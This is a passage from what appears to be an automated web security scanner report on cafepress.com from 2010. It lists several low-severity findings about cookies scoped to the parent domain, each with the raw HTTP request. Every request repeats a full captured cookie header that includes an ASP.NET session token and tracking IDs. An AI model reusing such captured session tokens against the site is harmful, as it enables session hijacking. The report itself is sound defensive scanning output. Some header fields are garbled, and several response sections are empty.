Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.25. http://www.cafepress.com/+magnets previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+magnets

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+magnets HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.26. http://www.cafepress.com/+mousepads previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+mousepads

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+mousepads HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.27. http://www.cafepress.com/+mugs previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+mugs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.28. http://www.cafepress.com/+ornaments previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+ornaments

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.29. http://www.cafepress.com/+posters previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+posters

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+posters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 65598
Date: Sun, 26 Dec 2010 13:47:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.30. http://www.cafepress.com/+stadium-blanket previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+stadium-blanket

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+stadium-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.31. http://www.cafepress.com/+steins previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+steins

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+steins HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.32. http://www.cafepress.com/+stocking previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+stocking

Issue detail

